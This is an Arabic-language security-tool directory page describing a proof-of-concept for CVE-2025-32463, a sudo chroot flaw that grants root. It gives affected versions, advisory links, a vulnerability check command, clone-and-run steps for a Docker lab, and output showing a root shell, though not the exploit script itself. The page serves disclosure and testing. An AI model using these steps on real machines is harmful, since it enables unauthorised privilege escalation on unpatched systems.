Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32463_chwoot — تصعيد الامتيازات إلى root عبر ثنائي sudo مع خيار chroot. CVE-2025-32463 | Kitploit
أدوات/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرالهروب من الحاوية
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

تصعيد الامتيازات إلى root عبر ثنائي sudo مع خيار chroot. CVE-2025-32463

عرض المستودع
52595منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32463 – PoC لثغرة sudo chroot ("chwoot")

يوفر هذا المستودع بيئة بسيطة وقابلة لإعادة الإنتاج لإظهار ثغرة تصعيد الامتيازات CVE‑2025‑32463 في ميزة chroot الخاصة بـ sudo.

  • تم الإبلاغ عن هذه الثغرة بواسطة Rich Mirch (@0xm1rch على X) لدى Stratascale.
  • المنشور الأصلي: نشرة الثغرة: تصعيد امتيازات Sudo chroot
  • NVD: CVE-2025-32463 (CVSS 9.3)

النسخ المتأثرة

النسخ القابلة للاستغلال من sudo 1.9.14 حتى 1.9.17 (جميع مراجعات p‑) في معظم توزيعات Linux متأثرة.

صفحات الأمان

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

المحتويات

الملفالغرض
Dockerfileينشئ صورة Ubuntu 24.04 مع sudo 1.9.16p2 القابل للاستغلال وأدوات البناء
sudo‑chwoot.shاستغلال إثبات المفهوم يفتح قشرة root داخل chroot
run.shسكربت مساعد يبني الصورة (عند الحاجة) ويشغّل حاوية الاستغلال

فحص سريع للثغرة

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

اختبار الاستغلال في حاوية Docker

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

يمرر run.sh الخيارين --privileged و--rm إلى Docker بحيث تُنظّف الحاوية نفسها عند خروجك.


التنظيف

احذف الصورة عندما تنتهي:

root@kitploit:~
docker rmi sudo-chwoot

المراجع

  • ملاحظة الثغرة من Stratascale CRU: نشرة الثغرة: تصعيد امتيازات Sudo chroot
تنزيل الأداة